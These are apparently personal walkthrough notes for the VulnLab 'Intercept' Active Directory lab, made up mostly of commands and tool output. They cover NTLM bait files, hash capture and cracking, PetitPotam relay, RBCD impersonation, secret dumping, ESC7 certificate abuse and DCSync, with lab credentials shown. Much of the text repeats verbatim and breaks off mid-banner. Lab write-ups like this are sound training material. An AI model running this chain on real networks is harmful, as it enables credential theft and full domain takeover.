Intercept (Chain)

This is not a writeup, just my notes about VulnLabs machines.

PreviousKaiju (Chain)NextSidecar (Chain)

Last updated 1 month ago

Intercept (Chain)

This is not a writeup, just my notes about VulnLabs machines.

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username

Password

Method

Scope

kathryn.spencer

Chocolate1

Capture NTLMv2

Domain User

Simon.Bowen

b0OI_fHO859+Aw

NTLM Relay attack

Domain User

✅ Valid Usernames

Rhys.King
Kathryn.Spencer
Dale.King
Billy.Watson
Hayley.Jennings
Vincent.Woods
Dorothy.Ford
Simon.Bowen
Reece.Vaughan
Louise.Williams

🔑 Passwords list

Chocolate1

Information Gathering

Nmap Scan

Nmap scan report for 10.10.141.165
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-30 01:05:24Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55168/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55195/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55206/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55221/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Nmap scan report for 10.10.141.166
PORT      STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open  tcpwrapped    syn-ack ttl 127

Service Enumeration

10.10.202.53

DNS

Not vulnerable to DNS Zone Transfer AXFR

SMB (enum4linux-ng)

Domain SID: S-1-5-21-3031021547-1480128195-3014128932
Root/Parent Domain Controller
Domain: intercept.vl
NetBIOS: DC01
FQDN: DC01.intercept.vl
Server allows null session authentication

Kerberos (Kerbrute)

statistically-likely-usernames/john.smith.txt returned valid usernames

10.10.202.54

SMB (Enum4linux-ng)

NetBIOS: WS01
Domain: intercept.vl
FQDN: WS01.intercept.vl
Server allows null session authentication
Server allows guest user authentication. (Useful)
Available Folder for guest authentication:
- dev - READ,WRITE
- Users - READ

Compromising domain user

Finding a valid usernames

They was not configured with UF_DONT_REQUIRE_PREAUTH set
Not username as password
Not empty password

❯ /opt/kerbrute/kerbrute userenum -d intercept.vl --dc 10.10.141.165 /opt/statistically-likely-usernames/john.smith.txt  -t 65

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/29/25 - Ronnie Flathers @ropnop

2025/04/29 21:14:15 >  Using KDC(s):
2025/04/29 21:14:15 >  	10.10.202.53:88

2025/04/29 21:14:39 >  [+] VALID USERNAME:	louise.williams@intercept.vl
2025/04/29 21:16:20 >  [+] VALID USERNAME:	dale.king@intercept.vl
2025/04/29 21:16:50 >  [+] VALID USERNAME:	billy.watson@intercept.vl
2025/04/29 21:24:33 >  Done! Tested 248231 usernames (3 valid) in 618.232 seconds

Finding interesting files

Readme1.txt
--------------------------
Please check this share regularly for updates to the application (this is a temporary solution until we switch to gitlab).


Readme2.txt
-------------------------
Driver still in development, coming soon.

Crafting malicious files to capture NTLMv2 hashes

❯ python3 ntlm_theft.py -g all --server 10.8.5.48 --filename update
Created: update/update.scf (BROWSE TO FOLDER)
Created: update/update-(url).url (BROWSE TO FOLDER)
Created: update/update-(icon).url (BROWSE TO FOLDER)
Created: update/update.lnk (BROWSE TO FOLDER)
Created: update/update.rtf (OPEN)
Created: update/update-(stylesheet).xml (OPEN)
Created: update/update-(fulldocx).xml (OPEN)
Created: update/update.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: update/update-(includepicture).docx (OPEN)
Created: update/update-(remotetemplate).docx (OPEN)
Created: update/update-(frameset).docx (OPEN)
Created: update/update-(externalcell).xlsx (OPEN)
Created: update/update.wax (OPEN)
Created: update/update.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: update/update.asx (OPEN)
Created: update/update.jnlp (OPEN)
Created: update/update.application (DOWNLOAD AND OPEN)
Created: update/update.pdf (OPEN AND ALLOW)
Created: update/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: update/Autorun.inf (BROWSE TO FOLDER)
Created: update/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

Uploading the files into dev folder

❯ smbclient '\\10.10.141.166\dev' -U 'Intrusionz3r0' -N
Try "help" to get a list of possible commands.
smb: \> recurse true
smb: \> mput *

Capturing Kathryn.Spencer's NTLMv2 hash

❯ sudo responder -I tun0
[sudo] password for Intrusionz3r0: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

<SNIF>

[!] Error starting TCP server on port 21, check permissions or other servers running.
[SMB] NTLMv2-SSP Client   : 10.10.202.54
[SMB] NTLMv2-SSP Username : INTERCEPT\Kathryn.Spencer
[SMB] NTLMv2-SSP Hash     : Kathryn.Spencer::INTERCEPT:3c715996a067a873:C8AEFC889DC694DEA73FF54D835AED5A:010100000000000000F7EDFF4CB9DB01036D385A42F6D0490000000002000800510039004400350001001E00570049004E002D0058004200450030004E0047004400440033004600540004003400570049004E002D0058004200450030004E004700440044003300460054002E0051003900440035002E004C004F00430041004C000300140051003900440035002E004C004F00430041004C000500140051003900440035002E004C004F00430041004C000700080000F7EDFF4CB9DB01060004000200000008003000300000000000000000000000002000002527C21C90E08E8970AA5B6BE1D741B88F53D12507CFF8AC16F533BB15E699560A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0035002E00340038000000000000000000

Cracking

❯ hashcat -m 5600 kathryn.spencer.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

KATHRYN.SPENCER::INTERCEPT:3c715996a067a873:c8aefc889dc694dea73ff54d835aed5a:010100000000000000f7edff4cb9db01036d385a42f6d0490000000002000800510039004400350001001e00570049004e002d0058004200450030004e0047004400440033004600540004003400570049004e002d0058004200450030004e004700440044003300460054002e0051003900440035002e004c004f00430041004c000300140051003900440035002e004c004f00430041004c000500140051003900440035002e004c004f00430041004c000700080000f7edff4cb9db01060004000200000008003000300000000000000000000000002000002527c21c90e08e8970aa5b6be1d741b88f53d12507cff8ac16f533bb15e699560a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000:Chocolate1

Credentials found: KATHRYN.SPENCER:Chocolate1

Default enumeration with valid credentials:

Retrieved valid usernames
Not bruteforce/password spraying successfully (empty,username as password)
Not asreproast users
Not kerberoast users
Not ADCS vulnerable templates
- Found PKI Enrollment Server: DC01.intercept.vl
- Found CN: intercept-DC01-CA
kathryn.spencer possesses MachineAccountQuota: 10 .
Coerce_plus by netexec
- VULNERABLE, DFSCoerce
- VULNERABLE, PetitPotam
- VULNERABLE, PrinterBug
- VULNERABLE, MSEven

Discovering a exploitable LDAP misconfiguration

LDAP Signing NOT Enforced!
LDAPS Channel Binding is set to "NEVER"

❯ nxc ldap 10.10.141.165-166 -u kathryn.spencer  -p 'Chocolate1' -M ldap-checker
SMB         10.10.202.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.202.53    389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
LDAP-CHE... 10.10.202.53    389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.202.53    389    DC01             LDAPS Channel Binding is set to "NEVER"

Discovering a WebClient Service available

#Enumerate WebClient Using NetExec
❯ nxc smb 10.10.141.165-166 -u kathryn.spencer  -p 'Chocolate1' -M webdav
SMB         10.10.202.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
SMB         10.10.202.54    445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:intercept.vl) (signing:False) (SMBv1:False)
SMB         10.10.202.53    445    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
SMB         10.10.202.54    445    WS01             [+] intercept.vl\kathryn.spencer:Chocolate1 
WEBDAV      10.10.202.54    445    WS01             WebClient Service enabled on: 10.10.202.54

#Enumerate WebClient Using webclientservicescanner 
❯ webclientservicescanner intercept.vl/kathryn.spencer:Chocolate1@10.10.141.165
WebClient Service Scanner v0.1.0 - pixis (@hackanddo) - Based on @tifkin_ idea

[10.10.202.53] STOPPED
[10.10.202.54] RUNNING

#Enumerate Webclient Using GetWebDAVStatus.exe
GetWebDAVStatus.exe 10.10.141.166

WebClient Service enabled on: 10.10.141.166

WebClient service can be indirectly abused by attackers to coerce authentications. This technique needs to be combined with other coercion techniques (e.g. PetitPotam, PrinterBug), or multicast poisoning, to act as a booster for these techniques. It allows attackers to elicit authentications made over HTTP instead of SMB, hence heightening NTLM relay capabilities.

Abusing NTLM Relay Attack

To successfully carry out this attack, the environment must have the following misconfigurations:

LDAP Signing is NOT enforced
LDAPS Channel Binding is set to "NEVER"
MachineAccountQuota > 0 (allows low-privileged users to create computer accounts)
PetitPotam vulnerability is present
Valid NetBIOS name resolution via Responder
Intranet zone conditions has to be meet.
- Which means add our Computer to the domain using the NetBIOS provided by Responder

Running responder to generate Netbios

/usr/share/responder/Responder.conf > SMB = Off and HTTP = Off

❯ sudo responder -I eth0 -w
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  
[+] Current Session Variables:
    Responder Machine Name     [WIN-5XYKF0PVHHL]
    Responder Domain Name      [R6XA.LOCAL]
    Responder DCE-RPC Port     [45461]

Adding our machine to the domain’s DNS records

❯ python3 ~/Documents/tools/krbrelayx/dnstool.py -u 'intercept.vl\KATHRYN.SPENCER' -p Chocolate1 --action add --record WIN-5XYKF0PVHHL.intercept.vl --data 10.8.5.48 --type A 10.10.141.165
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Coercing Authentication

❯ sudo python3 PetitPotam.py -d "intercept.vl" -u "kathryn.spencer" -p "Chocolate1"  WIN-5XYKF0PVHHL@80/Intrusionz3r0 10.10.141.166
Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.141.166[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Output

❯ impacket-ntlmrelayx -t ldaps://DC01.intercept.vl --delegate-access -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Connection from 10.10.141.166 controlled, attacking target ldaps://DC01.intercept.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Authenticating against ldaps://DC01.intercept.vl as INTERCEPT/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Connection from 10.10.141.166 controlled, attacking target ldaps://DC01.intercept.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] Attempting to create computer in: CN=Computers,DC=intercept,DC=vl
[*] Adding new computer with username: JDJUKOKR$ and password: k4f6$32#HX2#$/{ result: OK
[*] Delegation rights modified succesfully!
[*] JDJUKOKR$ can now impersonate users on WS01$ via S4U2Proxy
<SNIF>

Abusing Resource Based Constrained Delegation

❯ impacket-rbcd -delegate-from 'JDJUKOKR$' -delegate-to 'WS01$' -action 'write' 'intercept.vl/JDJUKOKR$:k4f6$32#HX2#$/{'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Accounts allowed to act on behalf of other identity:
[*]     JDJUKOKR$    (S-1-5-21-3031021547-1480128195-3014128932-4101)
[*] JDJUKOKR$ can already impersonate users on WS01$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     JDJUKOKR$    (S-1-5-21-3031021547-1480128195-3014128932-4101)

Requesting Ticket Granting Ticket using S4U

❯ impacket-getST 'intercept.vl/JDJUKOKR$:k4f6$32#HX2#$/{' -spn 'cifs/ws01.intercept.vl' -impersonate Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache

Dumping SAM database and LSA Secrets

❯ KRB5CCNAME='Administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache' impacket-secretsdump -k -no-pass WS01.intercept.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x04718518c7f81484a5ba5cc7f16ca912
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:831cbc509daa37aff98250b635e7f482:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:48daaaaa9654c3754d42b40e292ba63f:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERCEPT.VL/Simon.Bowen:$DCC2$10240#Simon.Bowen#35e1bb1dbd5f474e21819bb03ae5d103: (2023-06-27 20:07:12)
INTERCEPT.VL/Kathryn.Spencer:$DCC2$10240#Kathryn.Spencer#4d8e1b44d30998c82793a9808b959d91: (2023-06-29 11:51:33)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
INTERCEPT\WS01$:plain_password_hex:a5acf58651f67d4a49babcc008c3894b20ed9193d53362b81deadc3136844af97c775d4074d3c5f9c5ba5c0c55cad0d2f1992739b2a73921b1c8eaddebb652e0fe278f269dbda7a47f1e0fd8d2e816bcfa745344dcbb466e8c213a0d195b1d9e57ed4ff0888e905733fc959ef6c1dbd4e6001b38267fe3aa235834b75157d5ca4bd6cf8aba19b3a31afd5613c0acb1ec1365d5b737de435530792888678b811b7a060cf5f07313e216d1f3b90de551264f99f95c014fddc0ff738263d3eea3d0d75d8431b431d3e225787869658140e269405dd4a9c83d13fffac52e50a3d7402735d1b29f71c356ff7106a5088baff3
INTERCEPT\WS01$:aad3b435b51404eeaad3b435b51404ee:ff4e454b3439375b1a4d88b732ce4232:::
[*] DefaultPassword 
intercept.vl\Kathryn.Spencer:Chocolate1
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf6f65580470c139808ab7f0ffb709773d1531dc3
dpapi_userkey:0x24122e60857c28b7f2e6bdd138f22e3e4ddd58f3
[*] NL$KM 
 0000   4C A8 6F 51 3B B6 E6 22  0B A7 7A FD 4F 32 EA BC   L.oQ;.."..z.O2..
 0010   78 7A 98 1E DD 83 F2 70  37 73 9B 6C D0 03 9B 7F   xz.....p7s.l....
 0020   FA EA 8D AF A0 84 F9 0D  24 17 3C C9 97 3D 8A E7   ........$.<..=..
 0030   BC EE 5D B7 20 73 02 B7  E1 A7 62 E6 4D 8E F8 ED   ..]. s....b.M...
NL$KM:4ca86f513bb6e6220ba77afd4f32eabc787a981edd83f27037739b6cd0039b7ffaea8dafa084f90d24173cc9973d8ae7bcee5db7207302b7e1a762e64d8ef8ed
[*] _SC_HelpdeskService 
Simon.Bowen@intercept.vl:b0OI_fHO859+Aw
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

Credentials found: Simon.Bowen:b0OI_fHO859+Aw

Compromise Domain Controller

During the enumeration phase, it was discovered that the user Simon.Bowen is a member of the HelpDesk domain group. This group has GenericAll permissions over the CA-Managers group, which manages the enterprise Certificate Authority (CA) intercept-DC01-CA.

This attack exploits ESC7, where over-permissioned users/groups are able to reconfigure the Certificate Authority. By enabling SAN injection and creating malicious certificates, the attacker escalates to Domain Admin privileges without triggering standard authentication alerts.

Adding simon.bowen to ca-managers domain group

❯ bloodyAD --host dc01 -d intercept.vl -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' add groupMember 'ca-managers' 'Simon.Bowen'
[+] Simon.Bowen added to ca-managers

Enabling SubCA Template

❯ certipy-ad ca -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -enable-template 'SubCA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'intercept-DC01-CA'

Adding officer on intercept-DC01-CA

❯ certipy-ad ca -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -add-officer Simon.Bowen
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Simon.Bowen' on 'intercept-DC01-CA'

Requesting Administrator certificate using Subject Alternative Name (SAN)

❯ certipy-ad req -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 5
Would you like to save the private key? (y/N) y
[*] Saved private key to 5.key
[-] Failed to request certificate

Although initial enrollment failed due to template restrictions, the request was submitted and manually approved via:

Approving administrator certificate

❯ certipy-ad ca -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -issue-request 5
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

Retrieving Administrator certificate

❯ certipy-ad req -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -retrieve 5
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 5
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '5.key'
[*] Saved certificate and private key to 'administrator.pfx'

Requesting Administrator's Ticket Granting Ticket

❯ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.141.165 -user Administrator -domain intercept.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@intercept.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@intercept.vl': aad3b435b51404eeaad3b435b51404ee:ad95c338a6cc5729ae7390acbe0ca91f

Performing DCSync Attack

❯ impacket-secretsdump intercept.vl/administrator@10.10.141.165 -hashes aad3b435b51404eeaad3b435b51404ee:ad95c338a6cc5729ae7390acbe0ca91f -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6ff6959c0c141860804532b61d7cbe2f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:1c1047fe5fa8d7dc5810b174e13d28a17c8afb7ddd9c56577038d088ebb46b38
krbtgt:aes128-cts-hmac-sha1-96:04e31eb0a8c63d0f972e12d4c744331a
krbtgt:des-cbc-md5:852a92ab152cb952
[*] Cleaning up...

PreviousKaiju (Chain)NextSidecar (Chain)

Last updated 1 month ago

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username

Password

Method

Scope

kathryn.spencer

Chocolate1

Capture NTLMv2

Domain User

Simon.Bowen

b0OI_fHO859+Aw

NTLM Relay attack

Domain User

✅ Valid Usernames

Rhys.King
Kathryn.Spencer
Dale.King
Billy.Watson
Hayley.Jennings
Vincent.Woods
Dorothy.Ford
Simon.Bowen
Reece.Vaughan
Louise.Williams

🔑 Passwords list

Chocolate1

Information Gathering

Nmap Scan

Nmap scan report for 10.10.141.165
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-30 01:05:24Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55168/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55195/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55206/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55221/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Nmap scan report for 10.10.141.166
PORT      STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open  tcpwrapped    syn-ack ttl 127

Service Enumeration

10.10.202.53

DNS

Not vulnerable to DNS Zone Transfer AXFR

SMB (enum4linux-ng)

Domain SID: S-1-5-21-3031021547-1480128195-3014128932
Root/Parent Domain Controller
Domain: intercept.vl
NetBIOS: DC01
FQDN: DC01.intercept.vl
Server allows null session authentication

Kerberos (Kerbrute)

statistically-likely-usernames/john.smith.txt returned valid usernames

10.10.202.54

SMB (Enum4linux-ng)

NetBIOS: WS01
Domain: intercept.vl
FQDN: WS01.intercept.vl
Server allows null session authentication
Server allows guest user authentication. (Useful)
Available Folder for guest authentication:
- dev - READ,WRITE
- Users - READ

Compromising domain user

Finding a valid usernames

They was not configured with UF_DONT_REQUIRE_PREAUTH set
Not username as password
Not empty password

❯ /opt/kerbrute/kerbrute userenum -d intercept.vl --dc 10.10.141.165 /opt/statistically-likely-usernames/john.smith.txt  -t 65

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/29/25 - Ronnie Flathers @ropnop

2025/04/29 21:14:15 >  Using KDC(s):
2025/04/29 21:14:15 >  	10.10.202.53:88

2025/04/29 21:14:39 >  [+] VALID USERNAME:	louise.williams@intercept.vl
2025/04/29 21:16:20 >  [+] VALID USERNAME:	dale.king@intercept.vl
2025/04/29 21:16:50 >  [+] VALID USERNAME:	billy.watson@intercept.vl
2025/04/29 21:24:33 >  Done! Tested 248231 usernames (3 valid) in 618.232 seconds

Finding interesting files

Readme1.txt
--------------------------
Please check this share regularly for updates to the application (this is a temporary solution until we switch to gitlab).


Readme2.txt
-------------------------
Driver still in development, coming soon.

Crafting malicious files to capture NTLMv2 hashes

❯ python3 ntlm_theft.py -g all --server 10.8.5.48 --filename update
Created: update/update.scf (BROWSE TO FOLDER)
Created: update/update-(url).url (BROWSE TO FOLDER)
Created: update/update-(icon).url (BROWSE TO FOLDER)
Created: update/update.lnk (BROWSE TO FOLDER)
Created: update/update.rtf (OPEN)
Created: update/update-(stylesheet).xml (OPEN)
Created: update/update-(fulldocx).xml (OPEN)
Created: update/update.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: update/update-(includepicture).docx (OPEN)
Created: update/update-(remotetemplate).docx (OPEN)
Created: update/update-(frameset).docx (OPEN)
Created: update/update-(externalcell).xlsx (OPEN)
Created: update/update.wax (OPEN)
Created: update/update.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: update/update.asx (OPEN)
Created: update/update.jnlp (OPEN)
Created: update/update.application (DOWNLOAD AND OPEN)
Created: update/update.pdf (OPEN AND ALLOW)
Created: update/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: update/Autorun.inf (BROWSE TO FOLDER)
Created: update/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

Uploading the files into dev folder

❯ smbclient '\\10.10.141.166\dev' -U 'Intrusionz3r0' -N
Try "help" to get a list of possible commands.
smb: \> recurse true
smb: \> mput *

Capturing Kathryn.Spencer's NTLMv2 hash

❯ sudo responder -I tun0
[sudo] password for Intrusionz3r0: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
